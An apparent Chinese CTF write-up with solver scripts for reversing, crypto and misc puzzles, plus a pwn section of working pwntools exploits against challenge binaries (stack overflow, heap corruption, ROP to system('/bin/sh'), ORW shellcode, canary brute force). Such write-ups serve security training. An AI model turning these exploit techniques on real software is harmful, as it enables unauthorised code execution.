web RE PWN Crypto misc 新手 求帶
RE
fackre
這個當時 沒有做出來 去看牙了,,,,, 最後復現出來了。,。
直接看腳本
from Crypto.Util.number import *
#import gmpy2
import binascii
import hashlib
lists=[0x1b,0x5d,0x42,0x2b,0xd,0x5,0x48,0xe6,0x35,0x16,0x9e,0xb5,0xbb,0xe3,0x24,0xf,0x13,0xc0,0x59,0x96,0x5a,0x12,0x2b,0xe0,0x8f,0x21,0x8c,0x52,0xde,0x92,0x12,0x84,0xa3,0xe2,0x6e,0x7b,0x76,0xa2,0xf,0x51,0x93,0xa9,0x78,0xab,0x5f,0x5e,0x16,0x82,0x72,0x82,0x26,0xd1,0x26,0xd4,0x9,0xbf,0x74,0xda,0xa7,0x3e,0x99,0x2,0x65,0xc3,0xb3,0xad,0xe0,0x5a,0xab,0x7a,0x83,0x93,0x3f,0xa4,0x11,0x3d,0x8e,0xd,0xdf,0x5a,0x71,0x8,0x3a,0xc8,0xf4,0x90,0x16,0x1b,0x88,0xc6,0x50,0x6f,0xd1,0xa4,0xb3,0x73,0x7b,0x82,0xbf,0xb2,0x5f,0x94,0xde,0xca,0x5a,0x5e,0xab,0x25,0xbe,0x8c,0x1b,0x80,0x65,0x9e,0xec,0x5a,0x37,0x2a,0x75,0x2c,0x2d,0xba,0x56,0xd0,0xba,0x3a,0xb6,0x94,0x81,0x70,0x87,0x75,0x3d,0x48,0x63,0x7d,0x52,0x81,0x39,0xb5,0x23,0xd4,0xd3,0xdd,0x4b,0xd9,0xb8,0x35,0xa3,0xca,0x40,0x77,0x52,0x7c,0x9e,0x6c,0x42,0xd8,0x53,0x6f,0xea,0x2e,0xc,0x9a,0xf3,0x2a,0x6a,0xd5,0xea,0x6b,0x93,0x2f,0x18,0x5c,0xbe,0x96,0xb4,0x26,0xf,0xdb,0x9f,0x7,0x30,0xaf,0x93,0x34,0x27,0x8e,0xa,0xca,0x53,0xb7,0xc9,0x8f,0x9b,0x40,0x87,0x54,0x50,0x53,0x1e,0x55,0x6,0x4,0x87,0xc9,0x5e,0x78,0xa0,0x3f,0x66,0x8,0xb0,0x9,0x6e,0x83,0xe5,0x6c,0x23,0xe6,0x74,0x83,0x1,0xa4,0x7f,0x62,0x39,0x9,0x94,0x32,0xd3,0x88,0x93,0x61,0xc2,0xc6,0x61,0x6b,0x28,0xc7,0x61,0xdd,0xdb,0x90,0xa9,0xd5,0xd8,0x8a,0xa4,0xa0,0x65,0xc1,0x35,0x41,0xba,0xcf,0x4a,0x47,0xca,0xaf,0x51,0xe1,0x72,0x5a,0xbf,0x1e,0xb3,0x7a,0x80,0xf2,0x7a,0xcb,0x25,0xe6,0x98,0x96,0x1b,0x53,0x44,0xd8,0x3c,0xac,0x12,0xb1,0x64,0x47,0x35]
def rol_4(value,count):
nbits=32
count%=nbits
high = value >> (nbits - count)
value <<= count
value|=high
return value&0xffffffff
def ror_4(value,count):
nbits=32
count%nbits
high=value>>count
value<<=(nbits - count)
value|=high
return value&0xffffffff
def re_table(a1):
#print hex(a1)
#print hex(a1&0xff),hex((a1>>8)&0xff),hex((a1>>16)&0xff),hex((a1 >> 24)&0xff)
v1=(lists[((a1>>16)&0xff)] << 16) | (lists[((a1>>8)&0xff)] << 8) | (lists[a1&0xff]) | (lists[(a1 >> 24)&0xff] << 24)
v2 = ror_4(v1, 6)
v3 = ror_4(v1, 8) ^ v2
v4 = rol_4(v1, 10) ^ v3
return v4 ^ rol_4(v1, 12)
a1=0xCC227F52
a2=0x5227AA48
a3=0x34725FD0
a4=0x0F276B39
if __name__ =="__main__":
#print hex((ror_4(0x12345678,8)))
for i in range(0x1d-4+1):
s=a4^re_table(a1^a2^a3)
#print hex(s)
a4=a3
a3=a2
a2=a1
a1=s
#print hex(a1),hex(a2),hex(a3),hex(a4)
flag_s=a1.to_bytes(4, 'little')
flag_s+=a2.to_bytes(4, 'little')
flag_s+=a3.to_bytes(4, 'little')
flag_s+=a4.to_bytes(4, 'little')
flag="UNCTF{"
for i in flag_s:
flag+=chr(i)
flag_t="-Wh4t_aB0ut_yoU233?}"
flag+=flag_t
print(flag)
#print binascii.unhexlify(flag)
666:
就是一個簡單的異或移位算法 逆推回去就可以了
key=0x12
cmpstr='izwhroz""w"v.K".Ni'
flag=""
for i in range(0,key,3):
flag+=chr((ord(cmpstr[i])^key)-6)
flag+=chr((ord(cmpstr[i+1])^key)+6)
flag+=chr((ord(cmpstr[i+2])^key)^6)
print flag
世界上最好的xor
動態就有flag。。。
Checkhex
就是一個stringtohex。。。
Easy maze
一個簡單的maze 題目
地圖可以動態直接拿,,
然後簡單的bfs就可以拿到flag。。
#include<stdio.h>
#include<string.h>
#include<algorithm>
#include<vector>
#include<iostream>
#include<map>
#include<time.h>
#include<queue>
using namespace std;
int s[7][7]={
1,0,0,1,1,1,1,
1,0,1,1,0,0,1,
1,1,1,0,1,1,1,
0,0,0,1,1,0,0,
1,1,1,1,0,0,0,
1,0,0,0,1,1,1,
1,1,1,1,1,0,1,
};
int hh[5]= {1,0,-1,0};//y
int kk[5]= {0,1,0,-1};//x
char w[5]={'d','s','a','w'};
//O 左 o右 0下 .上
bool vis[9][9];
struct code{
int x,y;
queue<char>l;
}as,ad;
bool pd(int i,int j)
{
if(i>=0&&i<7&&j>=0&&j<7&&!vis[i][j]&&s[i][j]!=0)
return 1;
return 0;
}
void slove()
{
memset(vis,0,sizeof(vis));
queue<code>qq;
as.x=0,as.y=0;
while(!as.l.empty())
as.l.pop();
qq.push(as);
while(!qq.empty())
{
ad=qq.front();
qq.pop();
// printf("%d %d\n",ad.x,ad.y);
if(ad.x==6&&ad.y==6)
{
while(!ad.l.empty())
{
printf("%c",ad.l.front());
ad.l.pop();
}
// printf("1\n");
// printf("\n");
}
for(int i=0; i<4; i++)
{
as=ad;
as.x=ad.x+kk[i];
as.y=ad.y+hh[i];
if(pd(as.x,as.y))
{
//printf("%d %d %c\n",as.x,as.y,w[i]);
as.l.push(w[i]);
qq.push(as);
vis[as.x][as.y]=1;
}
}
}
}
int main()
{
slove();
return 0;
}
Easy vm
動態走幾遍就ok了,具體看腳本== =
ls =[
0xF4,0x0A,0xF7,0x64,0x99,0x78,0x9E,0x7D,0xEA,0x7B,0x9E,0x7B,0x9F,0x7E,0xEB,0x71,
0xE8,0x00,0xE8,0x07,0x98,0x19,0xF4,0x25,0xF3,0x21,0xA4,0x2F,0xF4,0x2F,0xA6,0x7C
]
flag=""
for i in range(31,-1,-1):
temp = ls[i]
temp^=0xCD
if i==0:
count=0
else:
count = ls[i - 1]
temp^=count
temp += i
flag+=chr(temp)
print flag[::-1]
Easy android
這個題目函數邏輯很清楚。
就是簡單的異或 然後對比md5值
去md5網站直接解不行, 因爲這裏是可見字符 異或 一個字符串內容 才md5的
所以 還是python 直接暴力可行 4位一組 很好爆破
#coding:utf-8
import hashlib
import string
# bd1d6ba7f1d3f5a13ebb0a75844cccfa
'''
fake_str='flag{this_is_a_fake_flag_ahhhhh}'
a = "2061e19de42da6e0de934592a2de3ca0"
b = "a81813dabd92cefdc6bbf28ea522d2d1"
c = "4b98921c9b772ed5971c9eca38b08c9f"
d = "81773872cbbd24dd8df2b980a2b47340"
e = "73b131aa8e4847d27a1c20608199814e"
f = "bbd7c4e20e99f0a3bf21c148fe22f21d"
gg = "bf268d46ef91eea2634c34db64c91ef2"
h = "0862deb943decbddb87dbf0eec3a06cc"
l=string.printable
flag=""
'''
'''for i in l:
for j in l:
for k in l:
for g in l:
flag=chr(ord(i)^ord('f'))
flag+=chr(ord(j)^ord('l'))
flag+=chr(ord(k)^ord('a'))
flag+=chr(ord(g)^ord('g'))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode=="2061e19de42da6e0de934592a2de3ca0":
print (i+j+k+g)
'''
'''
sss=0
print "[*]2"
for i in l:
for j in l:
for k in l:
for g in l:
flag=chr(ord(i)^ord(fake_str[sss*4+4]))
flag+=chr(ord(j)^ord(fake_str[sss*4+5]))
flag+=chr(ord(k)^ord(fake_str[sss*4+6]))
flag+=chr(ord(g)^ord(fake_str[sss*4+7]))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode==b:
print (i+j+k+g)
sss=sss+1
print "[*]3"
for i in l:
for j in l:
for k in l:
for g in l:
flag=chr(ord(i)^ord(fake_str[sss*4+4]))
flag+=chr(ord(j)^ord(fake_str[sss*4+5]))
flag+=chr(ord(k)^ord(fake_str[sss*4+6]))
flag+=chr(ord(g)^ord(fake_str[sss*4+7]))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode==c:
print (i+j+k+g)
sss=sss+1
print "[*]4"
for i in l:
for j in l:
for k in l:
for g in l:
flag=chr(ord(i)^ord(fake_str[sss*4+4]))
flag+=chr(ord(j)^ord(fake_str[sss*4+5]))
flag+=chr(ord(k)^ord(fake_str[sss*4+6]))
flag+=chr(ord(g)^ord(fake_str[sss*4+7]))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode==d:
print (i+j+k+g)
sss=sss+1
print "[*]5"
for i in l:
for j in l:
for k in l:
for g in l:
flag=chr(ord(i)^ord(fake_str[sss*4+4]))
flag+=chr(ord(j)^ord(fake_str[sss*4+5]))
flag+=chr(ord(k)^ord(fake_str[sss*4+6]))
flag+=chr(ord(g)^ord(fake_str[sss*4+7]))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode==e:
print (i+j+k+g)
sss=sss+1
print "[*]6"
for i in l:
for j in l:
for k in l:
for g in l:
flag=chr(ord(i)^ord(fake_str[sss*4+4]))
flag+=chr(ord(j)^ord(fake_str[sss*4+5]))
flag+=chr(ord(k)^ord(fake_str[sss*4+6]))
flag+=chr(ord(g)^ord(fake_str[sss*4+7]))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode==f:
print (i+j+k+g)
'''
#sss=sss+1
'''
print "[*]7"
for i in l:
for j in l:
for k in l:
for g in l:#_ahh
flag=chr(ord(i)^ord('_'))
flag+=chr(ord(j)^ord('a'))
flag+=chr(ord(k)^ord('h'))
flag+=chr(ord(g)^ord('h'))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode==gg:
print (i+j+k+g)
'''
'''
for i in l:
for j in l:
for k in l:
for g in l:
flag=chr(ord(i)^ord('h'))
flag+=chr(ord(j)^ord('h'))
flag+=chr(ord(k)^ord('h'))
flag+=chr(ord(g)^ord('}'))
checkcode = hashlib.md5(flag).hexdigest()
if checkcode==h:
print (i+j+k+g)
奇妙的RTF
這個題目有提示
OFFICE 2017年某CVE 百度一下就知道了是哪個,,
So 找到點
拿到flag
沒事 不難
這個題目 有個坑點 就是 要找到程序真正的計算的地方。
裏面是一個有點難搞的算法
寫一個腳本 搞出來就可以了
flag=""
l=[0x0B3,0x9C,0x0B7,0x0BF,0x0B2,0x0CB,0x0D3,0x0BF,0x0B2,0x0CB,0x0D3,0x0C9,0x0B1,0xcb,0x0D3,0x0BB,0x0AE,0x0AD,0x0A3,0x0CF,0x0AD,0x0CD,0x9F,0x0BB]
for i in range(6):
s=[]
for j in range(3,-1,-1):
temp=l[i*4+j]-0x96
for k in range(6):
s.append(temp%2)
temp=temp/2
temp=0
print len(s)
bits=128
count=0
for k in range(len(s)-1,-1,-1):
temp=temp+s[k]*bits
bits=bits/2
count+=1
if count==8:
count=0
bits=128
flag+=chr(temp)
temp=0
print flag
PWN:
Soso easy pwn
直接棧溢出就可以 只不過 需要爆破一位 16分之1的機率
# -*- coding: utf-8 -*-
from pwn import *
context.log_level='debug'
if __name__ =="__main__":
while True :
try:
io=process('./pwn')
elf=ELF('./pwn')
io.recv(16)
addr=int(io.recv(5))
#print hex(addr)
back_door=int(hex(addr)+'a'+'9cd',16)
log.success("back_door "+hex(back_door))
payload='a'*0xc+p32(back_door)
io.send(payload)
sleep(0.1)
io.recv()
io.sendline('0')
io.recv()
#io.recv()
except EOFError:
io.close()
else:
io.interactive()
Orw:
Orw的題目。。
# -*- coding: utf-8 -*-
from pwn import *
context.log_level='debug'
def add(size,content):
io.recvuntil("Your Choice: ")
io.sendline('1')
io.recvuntil("size: ")
io.sendline(str(size))
io.recvuntil("content: ")
io.sendline(content)
def delete(index):
io.recvuntil("Your Choice: ")
io.sendline('2')
io.recvuntil("idx: ")
io.sendline(str(index))
def edit(index,content):
io.recvuntil("Your Choice: ")
io.sendline('3')
io.recvuntil("idx: ")
io.sendline(str(index))
io.recvuntil("content: ")
io.sendline(content)
#io=remote('101.71.29.5',10005)
#libc=ELF('./x64_libc.so.6')
if __name__ =="__main__":
io=process('./pwn_heap')
elf=ELF('./pwn_heap')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
add(0x68,'')
add(0x78,'')
add(0x68,(p64(0)+p64(0x21))*6+'')
add(0x68,(p64(0)+p64(0x21))*6+'')
delete(0)
io.sendlineafter('Your Choice: ','1')
io.sendlineafter('size: ',str(0x68))
io.sendafter('content: ','a' * 0x60 + p64(0) + p8(0xf1))
delete(1)
delete(2)
add(0x78,'')
delete(0)
add(0x68,'a'*0x60+p64(0)+p8(0xa1))
delete(1)
add(0x98,'')
edit(1,'b'*0x70+p64(0)+p64(0x71)+p16(0x55dd))
add(0x68,'')
add(0x68,'c'*0x33+p64(0xfbad2887|0x1000)+p64(0)*3)
data=io.recvuntil('\xff\xff\xff\xff\xff\xff\xff\xff')
address=u64(data[0x88:0x90])
libc_addr=address-libc.symbols['_IO_2_1_stdin_']
success('libc_base:'+hex(libc_addr))
pause()
edit(1,'b'*0x70+p64(0)+p64(0x91))
delete(2)
edit(1,'b'*0x70+p64(0)+p64(0x91)+p64(0)+p64(libc_addr+libc.symbols['__free_hook']-0x20))
add(0x88,'')
#fastbinattack
edit(1,'b'*0x70+p64(0)+p64(0x71))
delete(2)
edit(1,'b'*0x70+p64(0)+p64(0x71)+p64(libc_addr+libc.symbols['__free_hook']-0x13))
frame=SigreturnFrame()
frame.rdi=0
frame.rsi=(libc_addr+libc.symbols['__free_hook'])&0xfffffffffffff000#
frame.rdx=0x2000
frame.rsp=(libc_addr+libc.symbols['__free_hook'])&0xfffffffffffff000
frame.rip=libc_addr+0x00000000000bc375#:syscall;ret;-->rcx
payload=str(frame)
add(0x68,payload[0x80:0x80+0x60])
add(0x68,'fff'+p64(libc_addr+libc.symbols['setcontext']+53))
edit(1,payload[:0x98])
delete(1)
layout=[
libc_addr+0x0000000000021102,#:poprdi;ret;
(libc_addr+libc.symbols['__free_hook'])&0xfffffffffffff000,
libc_addr+0x00000000000202e8,#:poprsi;ret;
0x2000,
libc_addr+0x0000000000001b92,#:poprdx;ret;
7,
libc_addr+0x0000000000033544,#:poprax;ret;
10,
libc_addr+0x00000000000bc375,#:syscall;ret;
libc_addr+0x0000000000002a71,#:jmprsp;
]
shellcode=asm('''
sub rsp, 0x800
push 0x67616c66
mov rdi, rsp
xor esi, esi
mov eax, 2
syscall
cmp eax, 0
js failed
mov edi, eax
mov rsi, rsp
mov edx, 0x100
xor eax, eax
syscall
mov edx, eax
mov rsi, rsp
mov edi, 1
mov eax, edi
syscall
jmp exit
failed:
push 0x6c696166
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, edi
syscall
exit:
xor edi, edi
mov eax, 231
syscall
''')
io.send(flat(layout)+shellcode)
#pause()
'''
io.sendline("1")
io.sendline("1")'''
io.interactive()
Driver
堆重疊+unlink
from pwn import*
context.log_level='debug'
context.arch='amd64'
def buy(choice,name):
io.recvuntil('Your Choice>> \n')
io.sendline('1')
io.recvuntil('Your Choice>> \n')
io.sendline(str(choice))
io.recvuntil('name: ')
io.sendline(name)
def dele(index):
io.recvuntil('Your Choice>> \n')
io.sendline('3')
io.recvuntil('index: ')
io.sendline(str(index))
def edit(index,name):
io.recvuntil('Your Choice>> \n')
io.sendline('4')
io.recvuntil('index: ')
io.sendline(str(index))
io.recvuntil('name: ')
io.send(name)
def edit1(index,name):
io.recvuntil('Your Choice>> \n')
io.sendline('6')
io.recvuntil('index: ')
io.sendline(str(index))
io.recvuntil('name: ')
io.send(name)
def drive(index,con):
io.recvuntil('Your Choice>> \n')
io.sendline('5')
io.recvuntil('index: ')
io.sendline(str(index))
io.recv()
io.sendline('1')
io.recvuntil('Your Choice>> \n')
io.sendline(str(con))
def drive1(index):
io.recvuntil('Your Choice>> \n')
io.sendline('5')
io.recvuntil('index: ')
io.sendline(str(index))
io.recv()
io.sendline('2')
io=process('./driver')
elf=ELF('./driver')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
if __name__ =="__main__":
io.recvuntil('Your Choice>> \n')
io.sendline('8')
io.recv(8)
heap_addr=int(io.recv(12),16)-0x10
success('heap_addr:'+hex(heap_addr))
buy(2,'a')
buy(2,'a')
dele(0)
buy(1,'a')
buy(2,'a')
dele(0)
dele(2)
dele(1)
buy(2,'a')
buy(1,'a')
drive(1,2)
malloc_hook_addr=int(io.recvuntil("Km")[:-2])/2-88-0x10
libc_base=malloc_hook_addr-libc.sym['__malloc_hook']
success('libc_base '+hex(libc_base))
buy(2,'a')
dele(0)
dele(1)
dele(2)
buy(2,'a')
buy(2,'a')
buy(3,'a'*0x1f0+p64(0x200)+p64(0x31))
edit(1,'a'*0xf0+p64(0x330))
dele(0)
dele(2)
buy(3,'\x00'*0xf8+p64(0x21)+p64(0xc8)+p64(1)+p64(0)+p64(0xf8)+p64(0)+p64(heap_addr+0x10))
dele(1)
buy(1,'a')
dele(0)
buy(3,'\x00'*0xf8+p64(0x21)+p64(heap_addr)+'\x00'*0x30+p64(0x41)+p64(0x100)+'\x00'*0x10+p64(0x220)+p64(0)+p64(heap_addr+0x30)+p64(0)+p64(0x21)+'\x00'*0x68+p64(0x41)+p64(0x64)+p64(0)+p64(0)+p64(0x68)+p64(0)+p64(heap_addr+0x10)[:-2])
dele(1)
buy(1,'1')
edit1(0,'\x00'*0xf8+p64(0x21)+p64(heap_addr)+'\x00'*0x70+p64(0x21)+'\x00'*0x68+p64(0x41)+p64(0x64)+p64(0)+p64(0)+p64(0x68)+p64(0)+p64(libc_base+libc.sym['__malloc_hook']))
edit1(1,p64(libc_base+0x4526a))
io.sendline("1")
sleep(0.5)
io.sendline("1")
io.interactive()
Shellocde
這就體驗到了 谷歌等搜索能力,,
找到一個64位的符合shllcode 是多麼的不容易,
import io
from pwn import*
context.log_level='debug'
context.arch='amd64'
io=process('./shellcode')
elf=ELF('./shellcode')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
if __name__ =="__main__":
io.recv()
io.sendline('Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M154J0S0X2K0W1M0D7p0F0z3V110b154y33164F0Z0D0h0u063O3f0y4y4D1k110n0H3c7l045O3f2n4y5L0Z0E0o3q3X0z0506')#\x0f\x05
io.interactive()
Babyrop
就。。。很簡單的rop題目
from pwn import*
context.log_level='debug'
io=process('./babyrop')
elf=ELF('./babyrop')
libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')
if __name__ =="__main__":
io.recvuntil("Hello CTFer!")
payload='a'*0x20+p32(0x66666666)
main_addr=0x08048592
io.sendline(payload)
io.recvuntil("What is your name?")
io.sendline('a'*0x14+p32(elf.plt['puts'])+p32(main_addr)+p32(elf.got['puts']))
io.recv()
libc_base=u32(io.recv()[:4])-libc.sym['puts']
success('libc_base:'+hex(libc_base))
io.sendline(payload)
io.recv()
bin_sh_addr=libc_base+libc.search("/bin/sh").next()
io.sendline('a'*0x14+p32(0x0804839e)+p32(libc_base+libc.sym['system'])+p32(main_addr)+p32(bin_sh_addr))
io.interactive()
easy_stack
這個題目給了四次的機會 然後因爲 32位的canary 最低位是0x00
所以我們只需要爆破三個字節 然後 最後一次直接getshell 就ok了
from pwn import*
context.log_level='debug'
if __name__ =="__main__":
io=process('./easystack')
elf=ELF('./easystack')
libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')
io.recvuntil("How much do you want to calc: ")
io.sendline('301')
for i in range(1,256):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(i*0x1000000))
for i in range(44):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(0xff000000))
io.recv()
io.sendline('0')
io.recv(10)
canary =(255-(int(io.recv(3))-299-44))<<24
io.recv()
io.sendline('n')
io.recvuntil("How much do you want to calc: ")
io.sendline('301')
for i in range(1,256):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str((i<<16)+canary))
#io.sendlineafter('num?(Input 0 to stop): ',str((i<<16)+canary))
for i in range(44):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(0xffff0000))
#io.sendlineafter('num?(Input 0 to stop): ',str(0xffff0000))
io.recv()
io.sendline('0')
io.recv(10)
canary+=(255-(int(io.recv(3))-299-44))<<16
io.recv()
io.sendline('n')
io.recvuntil("How much do you want to calc: ")
io.sendline('301')
for i in range(1,256):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str((i<<8)+canary))
for i in range(44):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(0xffffff00))
io.recv()
io.sendline('0')
io.recv(10)
canary+=(255-(int(io.recv(3))-299-44))<<8
#print hex(canary)
#pause()
io.recv()
stream_addr=0x08048750
cout_addr=0x0804A0C0
main_addr=0x080488E7
io.sendline('n')
io.recvuntil("How much do you want to calc: ")
io.sendline('320')
for i in range(300):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline('1')
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(canary))
for i in range(3):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline('1')
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(stream_addr))
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(main_addr))
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(cout_addr))
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(elf.got['setbuf']))
io.recvuntil("num?(Input 0 to stop): ")
io.sendline('0')
io.recv(10)
io.recv(3)
io.sendline('n')
io.recv()
libc_base=u32(io.recv(4))-libc.sym['setbuf']
log.success("libc_base "+hex(libc_base))
pause()
io.sendline('320')
for i in range(300):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline('1')
io.recv(timeout=0.1)
io.sendline(str(canary))
for i in range(3):
io.recvuntil("num?(Input 0 to stop): ")
io.sendline('1')
bin_sh_addr=libc_base+libc.search("/bin/sh").next()
system_addr=libc_base+libc.sym['system']
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(system_addr))
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(1))
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(bin_sh_addr))
io.recvuntil("num?(Input 0 to stop): ")
io.sendline(str(0))
pause()
io.interactive()
Box 有一個任意修改的指針 直接修改io file
from pwn import*
context.log_level='debug'
context.arch='amd64'
def add(ids,size):
io.recvuntil('Your Choice: ')
io.sendline('1')
io.recvuntil('Box ID: ')
io.sendline(str(ids))
io.recvuntil('Size: ')
io.sendline(str(size))
def edit(ids,con):
io.recvuntil('Your Choice: ')
io.sendline('2')
io.recvuntil('Box ID: ')
io,sendline(str(ids))
io.recvuntil('Box Content: ')
io.send(con)
def dele(ids):
io.recvuntil('Your Choice: ')
io.sendline('3')
io.recvuntil('Box ID: ')
io,sendline(str(ids))
if __name__ =="__main__":
io=process('./Box')
elf=ELF('./Box')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
edit(-27,'\x90')
edit(-27,p64(0x88))
edit(-12,p64(0x1800)+p64(0)*3+'\x88')
libc_base=u64(io.recv(8))-libc.sym['_IO_2_1_stdin_']
success('libc_base:'+hex(libc_base))
edit(-27,p64(libc_base+libc.sym['__free_hook'])+p64(0x68))
edit(-10,p64(libc_base+0x4526a))
add(0,0x68)
dele(0)
io.interactive()
Babyheap
from pwn import*
context.log_level='debug'
def add(content):
io.recvuntil("Your choice: ")
io.sendline('1')
io.recvuntil('content: ')
io.sendline(content)
def dele(index):
io.recvuntil("Your choice: ")
io.sendline('4')
io.recvuntil("index: ")
io.sendline(str(index))
def edit(index,size,content):
io.recvuntil("Your choice: ")
io.sendline('2')
io.recvuntil("index: ")
io.sendline(str(index))
io.recvuntil('size: ')
io.sendline(str(size))
io.recvuntil('content: ')
io.sendline(content)
def show(index):
io.recvuntil("Your choice: ")
io.sendline('3')
io.recvuntil("index: ")
io.sendline(str(index))
if __name__ =="__main__":
io=process('./baby_heap')
elf=ELF('./baby_heap')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
add('a'*0x10)
edit(0,0x18,'/bin/sh;'+'a'*0x10)
show(0)
io.recv(0x18)
libc_base=u64(io.recv(6)+'\x00\x00')-libc.sym['puts']
success('libc_base:'+hex(libc_base))
edit(0,0x20,'/bin/sh\x00'+'a'*0x10+p64(libc_base+libc.sym['system']))
show(0)
#gdb.attach(io)
#pause()
io.interactive()
MISC:
抓貓貓
玩遊戲就 get flag
親愛的
可以分離一個壓縮包,
然後 壓縮包註釋,
qmusic 2019.7.27 17:47
嗯, 親愛的 熱愛的 李現版的海闊天空
然後找到 這個時間點的評論 真的上頭 解壓 拿到flag
嗯 翻了好久的我
Hide secret
分離發現一個文件 但是 損壞 用010看 發現頭部 像壓縮包 但是是 0304 試着 加了補上50 4B 補上 壓縮包的魔數 試了試 發現可以
binwalk 1.jpg後分離出1.txt
得到一串
最後發現是base92解密.。。
解密就得出flag
信號不好我先掛了
這個是是合併的watermark
直接分離後
數獨
是一個數獨題目 一開始一直跑不出來,, 最後才知道 是這個題目少了一些限制,
bfs 就可以做 = = =
直接bfs一把梭
import datetime
from pwn import *
import copy
context.log_level = 'DEBUG'
global sum
l=[]
list2 = []
list3 = []
def pd(lens,v):
for i in range(9):
if list3[i][l[lens]%100]==v or list3[l[lens]/100][i]==v:
return 0
x=((l[lens]/100)/3)*3
y=((l[lens]%100)/3)*3
'''for i in range(x,x+3):
for j in range(y,y+3):
if list3[i][j]==v:
return 0'''
return 1
def dfs(lens):
print lens,sum
#print l
#print list3
if lens==sum:
for i in range(9):
str_end = ''
for j in range(9):
if(list2[i][j]==0):
str_end += str(list3[i][j])+(',')
io.sendline(str_end[:-1])
io.recvuntil('answer :\n')
io.interactive()
for i in range(1,10):
if pd(lens,i)==1:
list3[l[lens]/100][l[lens]%100]=i
dfs(lens+1)
list3[l[lens]/100][l[lens]%100]=0
if __name__ =="__main__":
sum=0
for i in range(100):
l.append(0)
print l
io=remote('101.71.29.5',10011)
io.recvuntil('commas.')
list1 = io.recvline()
for i in range(9):
list1 = io.recvline()
list1 = io.recvline()
list1 = list1.strip().split('|')[1:10]
list2.append(list1)
#print list2
for i in range(9):
for j in range(9):
if list2[i][j]=='' or list2[i][j]==' ':
list2[i][j]=0
else:
list2[i][j] = int(list2[i][j])
list3 = copy.deepcopy(list2)
#print list3
io.recvuntil('Please input row 1 answer :')
for i in range(9):
for j in range(9):
if list3[i][j]==0:
l[sum]=i*100+j
sum+=1
dfs(0)
Crypto
不僅僅是rsa
同一個q 求最大公因數就可以 = =
from Crypto.Util.number import *
import gmpy2
import binascii
p1=0xedbaab62d8b87c8f859dbea7981dc275fb080c66d4af11e2da21338133c8bfc1
q=0xd37984ec7c84c7a7e3326c0ef1ecc543abb78854f1c64927bc97ac4abcf1933b
p2=0xc5d721ad63a259550a062d26758e5a8a80135d07ee8b997ae608f131eb6234c9
e=41221
C1=4314251881242803343641258350847424240197348270934376293792054938860756265727535163218661012756264314717591117355736219880127534927494986120542485721347351
C2=485162209351525800948941613977942416744737316759516157292410960531475083863663017229882430859161458909478412418639172249660818299099618143918080867132349
n1=0xC461B3ED566F2D68583019170BDD5263D113BAECE3DEE6631F08A166376AC41FF5D4E90B3330E0FC26993E3B353F38F9B6B880DFBC5807636497561B7611047B
n2=0xA36E3A2A83FE2C1E33F285A08C3ECD36E377F4D9FFE828E2426D3ECED0A7F947631E932AEC327555511AC6D71E72686C1CB7DBBF3859A4D9A3D344FBF12A9553
phi=(p1-1)*(q-1)
d=gmpy2.invert(e,phi)
phi=(p2-1)*(q-1)
d2=gmpy2.invert(e,phi)
m=pow(C1,d,n1)
mm=pow(C2,d2,n2)
m=hex(m)
mm=hex(mm)
a=str(m)[2:]+str(mm)[2:]
print binascii.unhexlify(a)
一句話加密
這個n 在圖像的最後
這個kobe 真的誤導了我= == 讓我一直以爲 e是81,。
後來我發現這個題目的n是另一道題的n,,,那個題目的e是2.。。
然後我用RSAtools 試了一下。。
發現確實是。。。
ECC
這個題目一開始沒有看出來是什麼情況 , 然後搞得我很懵逼,,
E=EllipticCurve(GF(15424654874903),[16546484,4548674875])
G=E(6478678675, 5636379357093)
k=???????
K=k*G
#K=(2854873820564,9226233541419)
aes_key=???????
x=aes_key
M=E.lift_x(x)
r=?????????
C1=M+r*K
x1,y1=C1.xy()
C2=r*G
x2,y2=C2.xy()
print 'C1(%d,%d),C2(%d,%d)'%(x1,y1,x2,y2)
#output£º
C1(6860981508506,1381088636252),C2(1935961385155,8353060610242)
後來 惡補了一波 但是原理還是有點懵b
但是最後還是安裝了這個工具 看了題解
直接用真的爽,
E=EllipticCurve(GF(15424654874903),[16546484,4548674875])
G=E(6478678675, 5636379357093)
K=E(2854873820564,9226233541419)
k=G.discrete_log(K)
print 'k:%d'%(k)
C1=E(6860981508506,1381088636252)
C2=E(1935961385155,8353060610242)
M=C1-k*C2
aes_key,y=M.xy()
print 'aes_key:%d'%aes_key
print 'y:%d'%y
這個 運行出結果
跑出來key 之後就很簡單了
直接運行腳本就出來了
from Crypto.Cipher import AES
import base64
key="1026".ljust(16,' ').encode("utf-8")
#print(ases)
#key = (ases.ljust(16,' '))
aes = AES.new(key,AES.MODE_ECB)
text_enc_b64 = base64.b64decode('/cM8Nx+iAidmt6RiqX8Vww==')
